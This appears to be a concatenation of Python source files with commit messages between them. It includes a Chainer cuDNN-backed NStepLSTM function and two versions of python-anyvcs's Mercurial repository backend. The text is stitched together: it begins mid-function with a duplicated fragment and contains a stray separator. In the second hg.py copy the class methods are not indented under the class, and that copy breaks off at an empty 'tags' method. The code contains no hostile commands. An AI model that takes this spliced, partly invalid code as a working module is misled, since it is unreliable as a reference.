            workspace.data.ptr, work_size, dw_desc.value, dw.data.ptr,
            self.reserve_space.data.ptr, self.reserve_space.size)
        # Unpack dw back into per-layer weight/bias gradient arrays.
        dws = cuda.cupy.empty_like(ws)
        dbs = cuda.cupy.empty_like(bs)
        for layer in range(self.n_layers):
            for lin_layer_id in range(8):
                mat = cudnn.get_rnn_lin_layer_matrix_params(
                    handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
                    lin_layer_id)
                v = dws[layer, lin_layer_id]
                v = v.reshape(v.size)
                v[:] = mat.ravel()
                bias = cudnn.get_rnn_lin_layer_bias_params(
                    handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
                    lin_layer_id)
                v = dbs[layer, lin_layer_id]
                v = v.reshape(v.size)
                v[:] = bias.ravel()
        return dhx, dcx, dxs, dws, dbs
# Remove debug code
import numpy
from chainer import cuda
from chainer import function
from chainer.utils import type_check
# Alias the cuDNN wrappers only when CUDA reports cuDNN support; the
# functions below assume these names exist when they are called.
if cuda.cudnn_enabled:
    cudnn = cuda.cudnn
    libcudnn = cuda.cudnn.cudnn
class PointerArray(object):

    """A C-compatible array of raw pointers.

    Stores the pointer values as ``numpy.intp`` and retains a reference
    to the objects that own the pointed-to memory.
    """

    def __init__(self, lst, back_pointer):
        self._pointers = numpy.array(lst, dtype=numpy.intp)
        # Keep a reference so the GC cannot collect the originals.
        self._keepalive = back_pointer

    @property
    def data(self):
        # Address of the first element, suitable for passing to C APIs.
        return self._pointers.ctypes.data
def _make_tensor_descriptor_array(xs, rev=True):
    """Make an array of pointers denoting pointers of tensor descriptors.

    Arrays with fewer than three dimensions are reshaped to 3-D by padding
    with size-1 axes: prepended when ``rev`` is true, appended otherwise.
    """
    descs = []
    for x in xs:
        if x.ndim < 3:
            if rev:
                shape = (1,) * (3 - x.ndim) + x.shape
            else:
                shape = x.shape + (1,) * (3 - x.ndim)
            x = x.reshape(shape)
        # NOTE(review): ``rev=True`` is hard-coded although the function
        # accepts a ``rev`` parameter -- confirm whether this should be
        # ``rev=rev``.
        desc = cudnn.create_tensor_nd_descriptor(x, rev=True)
        descs.append(desc)
    # Descriptors stay alive via the back pointer; only raw values stored.
    return PointerArray([d.value for d in descs], descs)
def _make_ptr_array(xs):
    """Make an array of pointers denoting pointers of ndarrays.

    Each element of ``xs`` must expose ``.data.ptr`` (presumably cupy
    arrays -- verify against callers).
    """
    return PointerArray([x.data.ptr for x in xs], xs)
class DropoutStates(object):
    """Bundle of a cuDNN dropout state buffer and its descriptor."""
    def __init__(self, states, desc):
        self.states = states
        self.desc = desc
    @staticmethod
    def create(handle, dropout, seed):
        # Allocate a fresh state buffer and build a descriptor over it.
        states = cudnn.create_dropout_states(handle)
        desc = cudnn.create_dropout_descriptor(
            handle, dropout, states.data.ptr, states.size, seed)
        return DropoutStates(states, desc)
    @staticmethod
    def from_states(handle, states, dropout):
        # Reuse an existing state buffer; the descriptor is created
        # without attaching a buffer (ptr/size/seed all zero).
        desc = cudnn.create_dropout_descriptor(handle, dropout, 0, 0, 0)
        return DropoutStates(states, desc)
def _make_indices(batches):
pos = 0
inds = []
for b in batches[:-1]:
pos += b
inds.append(pos)
return inds
class NStepLSTM(function.Function):
    # Multi-layer unidirectional LSTM over a packed sequence, implemented
    # directly on top of the cuDNN RNN API.
    def __init__(self, n_layers, batches, states, train=True):
        # batches: per-time-step mini-batch sizes of the packed input.
        # states: DropoutStates applied between layers.
        self.n_layers = n_layers
        self.train = train
        self.states = states
        self.batches = batches
    def check_type_forward(self, in_types):
        # Inputs: hidden state, cell state, packed input, weights, biases.
        h_type, c_type, x_type, w_type, b_type = in_types
        type_check.expect(
            h_type.dtype == numpy.float32,
            c_type.dtype == numpy.float32,
            x_type.dtype == numpy.float32,
            h_type.ndim == 3,
            h_type.shape[0] == self.n_layers,
            c_type.ndim == 3,
            c_type.shape[0] == self.n_layers,
            x_type.shape[0] == sum(self.batches),
            # mini-batch size
            h_type.shape[1] == c_type.shape[1],
            # hidden size
            h_type.shape[2] == c_type.shape[2],
            h_type.shape[2] == x_type.shape[1],
            # cuDNN's LSTM has eight linear layers per stacked layer,
            # matching the range(8) loops below.
            w_type.ndim == 4,
            w_type.shape[0] == self.n_layers,
            w_type.shape[1] == 8,
            h_type.shape[2] == w_type.shape[2],
            h_type.shape[2] == w_type.shape[3],
            b_type.ndim == 3,
            b_type.shape[0] == self.n_layers,
            b_type.shape[1] == 8,
            h_type.shape[2] == b_type.shape[2],
        )
    def forward(self, inputs):
        hx, cx, xs, ws, bs = inputs
        length = len(self.batches)
        n_units = hx.shape[2]
        ys = cuda.cupy.empty_like(xs)
        # Split the packed input into per-time-step chunks.
        inds = _make_indices(self.batches)
        x_list = cuda.cupy.split(xs, inds, 0)
        # shape of h and c is (batch_size, n_layer, hidden_size) in Chainer
        # but (hidden_size, batch_size, n_layer) in cuDNN
        handle = cudnn.get_handle()
        self.handle = handle
        rnn_desc = cudnn.create_rnn_descriptor(
            n_units, length, self.n_layers, self.states.desc,
            libcudnn.CUDNN_LINEAR_INPUT, libcudnn.CUDNN_UNIDIRECTIONAL,
            libcudnn.CUDNN_LSTM, libcudnn.CUDNN_DATA_FLOAT)
        self.rnn_desc = rnn_desc
        c_x_descs = _make_tensor_descriptor_array(x_list)
        hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
        cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
        # Copy per-layer weights/biases into cuDNN's opaque parameter
        # blob (params size is in bytes; float32 is 4 bytes per element).
        weights_size = libcudnn.getRNNParamsSize(
            handle, rnn_desc.value, c_x_descs.data)
        w = cuda.cupy.empty((weights_size // 4, 1, 1), dtype=numpy.float32)
        w_desc = cudnn.create_filter_descriptor(w)
        for layer in range(self.n_layers):
            for lin_layer_id in range(8):
                mat = cudnn.get_rnn_lin_layer_matrix_params(
                    handle, rnn_desc, layer, c_x_descs, w_desc, w,
                    lin_layer_id)
                m = mat.reshape(mat.size)
                m[...] = ws[layer, lin_layer_id].ravel()
                bias = cudnn.get_rnn_lin_layer_bias_params(
                    handle, rnn_desc, layer, c_x_descs, w_desc, w,
                    lin_layer_id)
                b = bias.reshape(bias.size)
                b[...] = bs[layer, lin_layer_id]
        self.w = w
        self.w_desc = w_desc
        y_list = cuda.cupy.split(ys, inds, 0)
        c_y_descs = _make_tensor_descriptor_array(y_list)
        hy = cuda.cupy.empty_like(hx)
        cy = cuda.cupy.empty_like(cx)
        hy_desc = cudnn.create_tensor_nd_descriptor(hy, rev=True)
        cy_desc = cudnn.create_tensor_nd_descriptor(cy, rev=True)
        work_size = libcudnn.getRNNWorkspaceSize(
            handle, rnn_desc.value, c_x_descs.data)
        workspace = cuda.cupy.empty((work_size,), dtype='b')
        self.workspace = workspace
        if not self.train:
            libcudnn.RNNForwardInference(
                handle, rnn_desc.value,
                c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
                cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
                c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
                cy_desc.value, cy.data.ptr, workspace.data.ptr, work_size)
        else:
            # Training keeps a reserve buffer carrying intermediate
            # results over to the backward pass.
            reserve_size = libcudnn.getRNNTrainingReserveSize(
                handle, rnn_desc.value, c_x_descs.data)
            self.reserve_space = cuda.cupy.empty((reserve_size,), dtype='b')
            libcudnn.RNNForwardTraining(
                handle, rnn_desc.value,
                c_x_descs.data, xs.data.ptr, hx_desc.value, hx.data.ptr,
                cx_desc.value, cx.data.ptr, w_desc.value, w.data.ptr,
                c_y_descs.data, ys.data.ptr, hy_desc.value, hy.data.ptr,
                cy_desc.value, cy.data.ptr,
                workspace.data.ptr, work_size,
                self.reserve_space.data.ptr, reserve_size)
        # Keep descriptors and outputs alive for backward().
        self.c_y_descs = c_y_descs
        self.ys = ys
        self.c_x_descs = c_x_descs
        return hy, cy, ys
    def backward(self, inputs, grads):
        hx, cx, xs, ws, bs = inputs
        dhy, dcy, dys = grads
        # Missing upstream gradients are treated as zeros.
        if dhy is None:
            dhy = cuda.cupy.zeros_like(hx)
        if dcy is None:
            dcy = cuda.cupy.zeros_like(cx)
        if dys is None:
            #TODO
            dys = cuda.cupy.zeros_like(xs)
        inds = _make_indices(self.batches)
        dxs = cuda.cupy.empty_like(xs)
        dhx = cuda.cupy.empty_like(hx)
        dcx = cuda.cupy.empty_like(cx)
        hx_desc = cudnn.create_tensor_nd_descriptor(hx, rev=True)
        cx_desc = cudnn.create_tensor_nd_descriptor(cx, rev=True)
        dhy_desc = cudnn.create_tensor_nd_descriptor(dhy, rev=True)
        dcy_desc = cudnn.create_tensor_nd_descriptor(dcy, rev=True)
        dy_list = cuda.cupy.split(dys, inds, 0)
        c_dy_descs = _make_tensor_descriptor_array(dy_list)
        rnn_desc = self.rnn_desc
        handle = self.handle
        work_size = libcudnn.getRNNWorkspaceSize(
            handle, rnn_desc.value, self.c_x_descs.data)
        workspace = cuda.cupy.empty((work_size,), dtype='b')
        dhx_desc = cudnn.create_tensor_nd_descriptor(dhx, rev=True)
        dcx_desc = cudnn.create_tensor_nd_descriptor(dcx, rev=True)
        dx_list = cuda.cupy.split(dxs, inds, 0)
        c_dx_descs = _make_tensor_descriptor_array(dx_list)
        # Gradients w.r.t. inputs and initial states.
        libcudnn.RNNBackwardData(
            handle, rnn_desc.value, self.c_y_descs.data, self.ys.data.ptr,
            c_dy_descs.data, dys.data.ptr, dhy_desc.value, dhy.data.ptr,
            dcy_desc.value, dcy.data.ptr, self.w_desc.value, self.w.data.ptr,
            hx_desc.value, hx.data.ptr, cx_desc.value, cx.data.ptr,
            c_dx_descs.data, dxs.data.ptr, dhx_desc.value, dhx.data.ptr,
            dcx_desc.value, dcx.data.ptr, workspace.data.ptr, work_size,
            self.reserve_space.data.ptr, self.reserve_space.size)
        # Weight gradients are accumulated into dw, hence zeros_like.
        dw = cuda.cupy.zeros_like(self.w)
        dw_desc = cudnn.create_tensor_nd_descriptor(dw)
        libcudnn.RNNBackwardWeights(
            handle, rnn_desc.value, self.c_x_descs.data, xs.data.ptr,
            hx_desc.value, hx.data.ptr, self.c_y_descs.data, self.ys.data.ptr,
            workspace.data.ptr, work_size, dw_desc.value, dw.data.ptr,
            self.reserve_space.data.ptr, self.reserve_space.size)
        # Unpack dw back into per-layer weight/bias gradient arrays.
        dws = cuda.cupy.empty_like(ws)
        dbs = cuda.cupy.empty_like(bs)
        for layer in range(self.n_layers):
            for lin_layer_id in range(8):
                mat = cudnn.get_rnn_lin_layer_matrix_params(
                    handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
                    lin_layer_id)
                v = dws[layer, lin_layer_id]
                v = v.reshape(v.size)
                v[:] = mat.ravel()
                bias = cudnn.get_rnn_lin_layer_bias_params(
                    handle, rnn_desc, layer, c_dx_descs, dw_desc, dw,
                    lin_layer_id)
                v = dbs[layer, lin_layer_id]
                v = v.reshape(v.size)
                v[:] = bias.ravel()
        return dhx, dcx, dxs, dws, dbs
|
# Copyright 2013 Clemson University
#
# This file is part of python-anyvcs.
#
# python-anyvcs is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-anyvcs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with python-anyvcs. If not, see <http://www.gnu.org/licenses/>.
import datetime
import re
import subprocess
from common import *
# Name of the Mercurial executable to invoke.
HG = 'hg'
# 'hg manifest -v' line: three-digit octal mode, one-char type flag, name.
manifest_rx = re.compile(r'^(?P<mode>[0-7]{3}) (?P<type>.) (?P<name>.+)$')
# 'hg branches'/'hg tags' line: name, whitespace, rev:nodeid.
parse_heads_rx = re.compile(r'^(?P<name>.+?)\s+(?P<rev>-?\d+):(?P<nodeid>[0-9a-f]+)', re.I)
# 'hg bookmarks' line: optional '*' marks the active bookmark.
bookmarks_rx = re.compile(r'^\s+(?:\*\s+)?(?P<name>.+?)\s+(?P<rev>\d+):(?P<nodeid>[0-9a-f]+)', re.I)
# 'hg annotate -unv' line prefix: author and local revision number.
annotate_rx = re.compile(r'^(?P<author>.*)\s+(?P<rev>\d+):\s')
def parent_dirs(path):
  """Yield each ancestor directory of path, shallowest first."""
  slash = path.find('/')
  while slash >= 0:
    yield path[:slash]
    slash = path.find('/', slash + 1)
def parse_hgdate(datestr):
  """Parse hg's '{date|hgdate}' output: '<unix-timestamp> <tz-offset>'."""
  ts, tzoffset = datestr.split(None, 1)
  date = datetime.datetime.fromtimestamp(float(ts))
  # The sign flip and /60 convert hgdate's offset (seconds, presumably
  # west of UTC) into the unit UTCOffset expects -- verify against
  # common.UTCOffset.  NOTE(review): under Python 3 this division would
  # yield a float; this module appears to target Python 2 (p.next()
  # is used elsewhere in this file).
  return date.replace(tzinfo=UTCOffset(-int(tzoffset)/60))
class HgRepo(VCSRepo):

  """Mercurial repository access through the ``hg`` command-line client.

  Fixes relative to the previous revision:
  - ls('') with directory=True now honors the 'commit' report instead of
    returning a bare {'type': 'd'}.
  - the unexpected-type assert in ls no longer references an undefined
    name ('line').
  - _blame's per-revision cache is now keyed by the value actually used
    for lookup, so repeated revisions hit the cache.
  """

  @classmethod
  def create(cls, path):
    """Create a new repository at path and return an instance for it."""
    cmd = [HG, 'init', path]
    subprocess.check_call(cmd)
    return cls(path)

  @property
  def private_path(self):
    """A scratch directory inside .hg reserved for this library's use.

    Created on first access; an already-existing directory is fine.
    """
    import os
    path = os.path.join(self.path, '.hg', '.private')
    try:
      os.mkdir(path)
    except OSError as e:
      import errno
      if e.errno != errno.EEXIST:
        raise
    return path

  def _ls(self, rev, path, recursive=False, recursive_dirs=False,
          directory=False):
    """Yield (type, name) pairs for entries under path at rev.

    Type characters come from 'hg manifest -v' (' ' regular file, '*'
    executable, '@' symlink) plus a synthesized 'd' for directories.
    Raises PathDoesNotExist when nothing under path matches.
    """
    forcedir = False
    if path.endswith('/'):
      forcedir = True
      path = path.rstrip('/')
    if path == '':
      ltrim = 0
      prefix = ''
    else:
      # Strip 'path/' from the front of each returned entry name.
      ltrim = len(path) + 1
      prefix = path + '/'
    cmd = [HG, 'manifest', '-v', '-r', rev]
    output = self._command(cmd)
    dirs = set()
    exists = False
    for line in output.splitlines():
      m = manifest_rx.match(line)
      assert m, 'unexpected output: ' + line
      t, name = m.group('type', 'name')
      if name.startswith(prefix) or (not forcedir and name == path):
        if directory and name.startswith(prefix):
          # Caller asked about the directory itself, not its contents.
          yield ('d', '')
          return
        exists = True
        entry_name = name[ltrim:]
        if '/' in entry_name:
          p = parent_dirs(entry_name)
          if not recursive:
            # Report only the first path component, once.
            d = p.next()
            if d not in dirs:
              dirs.add(d)
              yield ('d', d)
            continue
          if recursive_dirs:
            for d in p:
              if d not in dirs:
                dirs.add(d)
                yield ('d', d)
        yield (t, entry_name)
    if not exists:
      raise PathDoesNotExist(rev, path)

  def ls(self, rev, path, recursive=False, recursive_dirs=False,
         directory=False, report=()):
    """List entries at path as of rev.

    report may contain 'executable', 'size', 'target' and/or 'commit' to
    request the corresponding extra fields on each returned entry.
    """
    revstr = str(rev)
    path = type(self).cleanPath(path)
    if path == '':
      if directory:
        # The manifest never lists the repository root itself, so its
        # entry is synthesized here; honor the 'commit' report the same
        # way as for any other directory.
        entry = attrdict()
        entry.type = 'd'
        if 'commit' in report:
          cmd = [HG, 'log', '--template={node}', '-l1', '-r',
                 'reverse(ancestors(' + revstr + '))']
          entry.commit = self._command(cmd)
        return [entry]
    if 'commit' in report:
      # Pre-compute one log of rev's ancestry (newest first) so the
      # per-entry commit lookup below does not need to invoke hg once
      # per entry.  Each record is '<rev>\n<node>\n<files...>' NUL-separated.
      import tempfile
      with tempfile.NamedTemporaryFile() as style:
        style.write(
          r"changeset = '{rev}\n{node}\n{files}\0'" '\n'
          r"file = '{file|escape}\n'" '\n'
        )
        style.flush()
        cmd = [HG, 'log', '--style', style.name, '-r', 'reverse(ancestors('+revstr+'))']
        log = self._command(cmd).split('\0')
    else:
      log = None
    results = []
    for t, name in self._ls(revstr, path, recursive, recursive_dirs, directory):
      entry = attrdict()
      if name:
        entry.name = name
      if t == 'd':
        entry.type = 'd'
      elif t in ' *':
        entry.type = 'f'
        if 'executable' in report:
          entry.executable = t == '*'
        if 'size' in report:
          entry.size = len(self._cat(revstr, name))
      elif t == '@':
        entry.type = 'l'
        if 'target' in report:
          entry.target = self._cat(revstr, name)
      else:
        # Fixed NameError: previous message referenced an undefined 'line'.
        assert False, 'unexpected type: ' + t
      if 'commit' in report:
        p = type(self).cleanPath(path + '/' + name)
        if log is None:
          cmd = [HG, 'log', '--template={node}', '-l1', '-r', 'reverse(ancestors('+revstr+'))', '--', p]
          entry.commit = self._command(cmd)
        else:
          # Newest ancestor that touched p (or something beneath it).
          for logentry in log:
            lines = logentry.splitlines()
            found = False
            for l in lines[2:]:
              if l == p or l.startswith(p+'/'):
                found = True
                break
            if found:
              entry.commit = lines[1]
              break
      results.append(entry)
    return results

  def _cat(self, rev, path):
    """Raw 'hg cat' of path at rev; no type checking."""
    cmd = [HG, 'cat', '-r', rev, path]
    return self._command(cmd)

  def cat(self, rev, path):
    """Contents of the regular file at path; BadFileType otherwise."""
    path = type(self).cleanPath(path)
    ls = self.ls(rev, path, directory=True)
    assert len(ls) == 1
    if ls[0].get('type') != 'f':
      raise BadFileType(rev, path)
    return self._cat(str(rev), path)

  def readlink(self, rev, path):
    """Target of the symlink at path; BadFileType otherwise."""
    path = type(self).cleanPath(path)
    ls = self.ls(rev, path, directory=True)
    assert len(ls) == 1
    if ls[0].get('type') != 'l':
      raise BadFileType(rev, path)
    return self._cat(str(rev), path)

  def _parse_heads(self, cmd):
    # Shared parser for 'hg branches' / 'hg tags' style output.
    output = self._command(cmd)
    results = []
    for line in output.splitlines():
      m = parse_heads_rx.match(line)
      assert m, 'unexpected output: ' + line
      results.append(m.group('name'))
    return results

  def branches(self):
    """Names of all branches."""
    cmd = [HG, 'branches']
    return self._parse_heads(cmd)

  def tags(self):
    """Names of all tags."""
    cmd = [HG, 'tags']
    return self._parse_heads(cmd)

  def bookmarks(self):
    """Names of all bookmarks."""
    cmd = [HG, 'bookmarks']
    output = self._command(cmd)
    if output.startswith('no bookmarks set'):
      return []
    results = []
    for line in output.splitlines():
      m = bookmarks_rx.match(line)
      assert m, 'unexpected output: ' + line
      results.append(m.group('name'))
    return results

  def heads(self):
    """All branch, tag, and bookmark names."""
    return self.branches() + self.tags() + self.bookmarks()

  def empty(self):
    """True if the repository has no commits."""
    cmd = [HG, 'log', '--template=a', '-l1']
    output = self._command(cmd)
    return output == ''

  def __contains__(self, rev):
    """True if rev resolves to a changeset."""
    cmd = [HG, 'log', '--template=a', '-r', str(rev)]
    p = subprocess.Popen(cmd, cwd=self.path, stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    stdout, stderr = p.communicate()
    return p.returncode == 0

  def __len__(self):
    """Number of commits (tip's local revision number is 0-based)."""
    cmd = [HG, 'id', '-n', '-r', 'tip']
    output = self._command(cmd)
    return int(output) + 1

  def log(self, revrange=None, limit=None, firstparent=False, merges=None,
          path=None, follow=False):
    """Return commit log entries.

    revrange may be None (full history), a single revision (returns one
    CommitLogEntry rather than a list), or a (start, end) pair where
    either element may be None.  limit caps the number of entries;
    firstparent/merges/path/follow map onto the corresponding
    'hg log' options.
    """
    # The '\\0' below are literal backslash-zero sequences that hg's
    # template engine turns into NUL bytes, used as field separators.
    cmd = [HG, 'log', '--debug', '--template={node}\\0{parents}\\0'
           '{date|hgdate}\\0{author|nonempty}\\0{desc|tabindent|nonempty}\\0\\0']
    if limit is not None:
      cmd.append('-l' + str(limit))
    if firstparent:
      cmd.append('--follow-first')
    if merges is not None:
      if merges:
        cmd.append('--only-merges')
      else:
        cmd.append('--no-merges')
    single = False
    if revrange is None:
      pass
    elif isinstance(revrange, (tuple, list)):
      if revrange[0] is None:
        if revrange[1] is None:
          pass
        else:
          cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1]])
      else:
        if revrange[1] is None:
          cmd.extend(['-r', 'reverse(descendants(%s))' % revrange[0]])
        else:
          cmd.extend(['-r', 'reverse(ancestors(%s))' % revrange[1], '--prune', str(revrange[0])])
    else:
      cmd.extend(['-r', str(revrange)])
      single = True
    if path:
      if follow:
        cmd.append('--follow')
      cmd.extend(['--', type(self).cleanPath(path)])
    output = self._command(cmd)
    results = []
    logs = output.split('\0\0')
    logs.pop()
    for log in logs:
      rev, parents, date, author, message = log.split('\0', 4)
      # --debug prints parents as 'rev:node'; drop null parents (-1).
      parents = [x[1] for x in filter(lambda x: x[0] != '-1',
                                      (x.split(':') for x in parents.split()))]
      date = parse_hgdate(date)
      # Undo the tabindent template filter on the description.
      message = message.replace('\n\t', '\n')
      entry = CommitLogEntry(rev, parents, date, author, message)
      if single:
        return entry
      results.append(entry)
    return results

  def pdiff(self, rev):
    """Patch for rev; [1:] strips the single 'a' printed by the template."""
    cmd = [HG, 'log', '--template=a', '-p', '-r', str(rev)]
    return self._command(cmd)[1:]

  def diff(self, rev_a, rev_b, path=None):
    """Diff between two revisions, optionally restricted to path."""
    cmd = [HG, 'diff', '-r', rev_a, '-r', rev_b]
    if path is not None:
      cmd.extend(['--', type(self).cleanPath(path)])
    return self._command(cmd)

  def ancestor(self, rev1, rev2):
    """Greatest common ancestor node of rev1 and rev2, or None."""
    cmd = [HG, 'log', '--template={node}', '-r', 'ancestor(%s, %s)' % (rev1, rev2)]
    output = self._command(cmd)
    if output == '':
      return None
    else:
      return output

  def _blame(self, rev, path):
    cmd = [HG, 'annotate', '-unv', '-r', rev, '--', path]
    output = self._command(cmd)
    revs = {}
    results = []
    cat = self._cat(rev, path)
    for line, text in zip(output.splitlines(), cat.splitlines()):
      m = annotate_rx.match(line)
      assert m, 'unexpected output: ' + line
      num, author = m.group('rev', 'author')
      try:
        node, date = revs[num]
      except KeyError:
        cmd = [HG, 'log', '--template={node}\n{date|hgdate}', '-r', num]
        node, date = self._command(cmd).split('\n', 1)
        date = parse_hgdate(date)
        # Key the cache by the local revision number that is used for
        # lookup; the old code keyed it by node, so it never hit and
        # ran one 'hg log' per line.
        revs[num] = node, date
      results.append(blame_tuple(node, author, date, text))
    return results

  def blame(self, rev, path):
    """Per-line (node, author, date, text) blame of the file at path."""
    path = type(self).cleanPath(path)
    ls = self.ls(rev, path, directory=True)
    assert len(ls) == 1
    if ls[0].get('type') != 'f':
      raise BadFileType(rev, path)
    return self._blame(str(rev), path)
# correctly report commit for / when directory=True
# Copyright 2013 Clemson University
#
# This file is part of python-anyvcs.
#
# python-anyvcs is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# python-anyvcs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with python-anyvcs. If not, see <http://www.gnu.org/licenses/>.
import datetime
import re
import subprocess
from common import *
# Name of the Mercurial executable invoked for every repository operation.
HG = 'hg'
# Parses 'hg manifest -v' lines: "<octal mode> <type char> <file name>".
manifest_rx = re.compile(r'^(?P<mode>[0-7]{3}) (?P<type>.) (?P<name>.+)$')
# Parses 'hg branches'/'hg tags' lines: "<name>  <rev>:<nodeid>".
parse_heads_rx = re.compile(r'^(?P<name>.+?)\s+(?P<rev>-?\d+):(?P<nodeid>[0-9a-f]+)', re.I)
# Parses 'hg bookmarks' lines; the optional "* " marks the active bookmark.
bookmarks_rx = re.compile(r'^\s+(?:\*\s+)?(?P<name>.+?)\s+(?P<rev>\d+):(?P<nodeid>[0-9a-f]+)', re.I)
# Parses 'hg annotate -unv' line prefixes: "<author> <rev>: ".
annotate_rx = re.compile(r'^(?P<author>.*)\s+(?P<rev>\d+):\s')
def parent_dirs(path):
    """Yield each ancestor directory of a '/'-separated path.

    For 'a/b/c' this yields 'a' then 'a/b'; a path with no slash yields nothing.
    """
    sep = path.find('/')
    while sep != -1:
        yield path[:sep]
        sep = path.find('/', sep + 1)
def parse_hgdate(datestr):
    """Parse Mercurial's '{date|hgdate}' format into a tz-aware datetime.

    The input is "<unix timestamp> <tz offset in seconds west of UTC>".
    """
    timestamp, offset = datestr.split(None, 1)
    stamp = datetime.datetime.fromtimestamp(float(timestamp))
    return stamp.replace(tzinfo=UTCOffset(-int(offset)/60))
class HgRepo(VCSRepo):
@classmethod
def create(cls, path):
    """Initialize a new Mercurial repository at path and return a repo object."""
    subprocess.check_call([HG, 'init', path])
    return cls(path)
@property
def private_path(self):
    """Directory for data private to anyvcs, created on first access."""
    import errno
    import os
    private = os.path.join(self.path, '.hg', '.private')
    try:
        os.mkdir(private)
    except OSError as e:
        # Already existing is fine; anything else is a real failure.
        if e.errno != errno.EEXIST:
            raise
    return private
def _ls(self, rev, path, recursive=False, recursive_dirs=False,
        directory=False):
    """Yield (type, name) entries under path at rev from 'hg manifest -v'.

    type is the manifest type char (' ' file, '*' executable, '@' symlink)
    or 'd' for a synthesized directory entry.  Raises PathDoesNotExist when
    nothing in the manifest matches path.
    """
    # A trailing slash forces directory semantics (an exact file match
    # with that name will not be reported).
    forcedir = False
    if path.endswith('/'):
        forcedir = True
        path = path.rstrip('/')
    if path == '':
        ltrim = 0
        prefix = ''
    else:
        # Number of chars to strip so yielded names are relative to path.
        ltrim = len(path) + 1
        prefix = path + '/'
    cmd = [HG, 'manifest', '-v', '-r', rev]
    output = self._command(cmd)
    dirs = set()  # directories already yielded, to avoid duplicates
    exists = False
    for line in output.splitlines():
        m = manifest_rx.match(line)
        assert m, 'unexpected output: ' + line
        t, name = m.group('type', 'name')
        if name.startswith(prefix) or (not forcedir and name == path):
            if directory and name.startswith(prefix):
                # Caller wants the directory itself, not its listing.
                yield ('d', '')
                return
            exists = True
            entry_name = name[ltrim:]
            if '/' in entry_name:
                p = parent_dirs(entry_name)
                if not recursive:
                    # Only the first-level subdirectory is reported,
                    # and the file inside it is skipped.
                    d = p.next()
                    if d not in dirs:
                        dirs.add(d)
                        yield ('d', d)
                    continue
                if recursive_dirs:
                    # Report every intermediate directory once.
                    for d in p:
                        if d not in dirs:
                            dirs.add(d)
                            yield ('d', d)
            yield (t, entry_name)
    if not exists:
        raise PathDoesNotExist(rev, path)
def ls(self, rev, path, recursive=False, recursive_dirs=False,
       directory=False, report=()):
    """List entries under path at rev as attrdicts.

    report is a set of optional fields to include: 'commit', 'executable',
    'size', 'target'.  When 'commit' is requested, a single styled
    'hg log' over the revision's ancestors is parsed once instead of one
    'hg log' per entry.
    """
    revstr = str(rev)
    path = type(self).cleanPath(path)
    if path == '':
        if directory:
            # Repository root requested as a directory entry.
            entry = attrdict(type='d')
            if 'commit' in report:
                cmd = [HG, 'log', '--template={node}', '-r', revstr]
                entry.commit = self._command(cmd)
            return [entry]
    if 'commit' in report:  # was 'True and ...'; the redundant True is dropped
        import tempfile
        with tempfile.NamedTemporaryFile() as style:
            # Custom style: "<rev>\n<node>\n<file>\n<file>...\0" per changeset.
            style.write(
                r"changeset = '{rev}\n{node}\n{files}\0'" '\n'
                r"file = '{file|escape}\n'" '\n'
            )
            style.flush()
            cmd = [HG, 'log', '--style', style.name, '-r', 'reverse(ancestors('+revstr+'))']
            log = self._command(cmd).split('\0')
    else:
        log = None
    results = []
    for t, name in self._ls(revstr, path, recursive, recursive_dirs, directory):
        entry = attrdict()
        if name:
            entry.name = name
        if t == 'd':
            entry.type = 'd'
        elif t in ' *':
            entry.type = 'f'
            if 'executable' in report:
                entry.executable = t == '*'
            if 'size' in report:
                entry.size = len(self._cat(revstr, name))
        elif t == '@':
            entry.type = 'l'
            if 'target' in report:
                entry.target = self._cat(revstr, name)
        else:
            # BUG FIX: the original message referenced 'line', which is not
            # defined in this scope and raised NameError instead of the
            # intended AssertionError.
            assert False, 'unexpected manifest type: ' + repr(t)
        if 'commit' in report:
            p = type(self).cleanPath(path + '/' + name)
            if log is None:
                cmd = [HG, 'log', '--template={node}', '-l1', '-r', 'reverse(ancestors('+revstr+'))', '--', p]
                entry.commit = self._command(cmd)
            else:
                # Find the most recent ancestor changeset touching p.
                for logentry in log:
                    lines = logentry.splitlines()
                    found = False
                    for l in lines[2:]:
                        if l == p or l.startswith(p+'/'):
                            found = True
                            break
                    if found:
                        entry.commit = lines[1]
                        break
        results.append(entry)
    return results
def _cat(self, rev, path):
    """Return the raw contents of path at rev via 'hg cat'."""
    return self._command([HG, 'cat', '-r', rev, path])
def cat(self, rev, path):
    """Return file contents at rev; raise BadFileType unless path is a regular file."""
    cleaned = type(self).cleanPath(path)
    entries = self.ls(rev, cleaned, directory=True)
    assert len(entries) == 1
    if entries[0].get('type') != 'f':
        raise BadFileType(rev, cleaned)
    return self._cat(str(rev), cleaned)
def readlink(self, rev, path):
    """Return a symlink's target at rev; raise BadFileType unless path is a symlink."""
    cleaned = type(self).cleanPath(path)
    entries = self.ls(rev, cleaned, directory=True)
    assert len(entries) == 1
    if entries[0].get('type') != 'l':
        raise BadFileType(rev, cleaned)
    return self._cat(str(rev), cleaned)
def _parse_heads(self, cmd):
    """Run cmd and extract the head name from each line of its output."""
    names = []
    for line in self._command(cmd).splitlines():
        m = parse_heads_rx.match(line)
        assert m, 'unexpected output: ' + line
        names.append(m.group('name'))
    return names
def branches(self):
    """Return the names of all named branches."""
    return self._parse_heads([HG, 'branches'])
def tags(self):
